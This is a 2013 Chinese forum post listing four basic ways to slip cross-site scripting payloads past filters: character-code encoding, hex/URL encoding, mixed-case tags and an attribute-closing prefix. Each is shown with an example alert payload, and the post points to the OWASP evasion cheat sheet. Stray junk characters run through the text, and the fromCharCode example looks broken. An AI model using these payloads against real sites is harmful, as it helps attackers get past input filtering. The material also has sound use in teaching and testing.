四种超级基础的绕过方法。
& I( e5 c7 Y; I$ R1.转换为ASCII码
0 r, P4 F( D$ ?# p, @5 H# }) r例子:原脚本为<script>alert(‘I love F4ck’)</script >
6 f6 p9 {( O7 C5 A3 }, S通过转换,变成:
/ B$ T* f1 P$ `<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>/ a, O7 G9 m! e8 ]
( e) L5 t8 Y/ A* R2.转换为HEX(十六进制)) U, I* v1 R5 c6 W
例子:原脚本为<script>alert(‘I love F4ck’)</script>9 s1 `1 Z7 `' O0 ?9 c+ D% t/ a
通过转换,变成:1 D5 g" q% T$ q4 `) J9 _" f1 `
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
& p9 `3 P" V! P2 }5 r w' I % |/ o8 t$ @7 f! S2 G0 ^8 W9 j: x
3.转换脚本的大小写/ [) M R5 _. x+ b4 g
例子:原脚本为<script>alert(‘I love F4ck’)</script>
8 N+ J9 Q3 f3 V; }4 ?$ f" }% Z转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>4 f% \1 L2 K2 k& D8 {+ Q
2 k7 c ]5 E. _+ r+ b" J
4.增加闭合标记”>
3 }3 Q, ]) {* z! u! K例子:原脚本为<script>alert(‘I love F4ck’)</script>
, C' F: u- y2 f# ?% l) P, u d转换为:”><script>alert(‘I love F4ck’)</script>
8 c4 N0 X; L- T/ D8 F更详细绕过技术请参考此网页' x* _6 V- H3 p# t* k: E9 I
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet& z+ f5 A& Y I u
; x3 V# Y9 t, k0 c
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对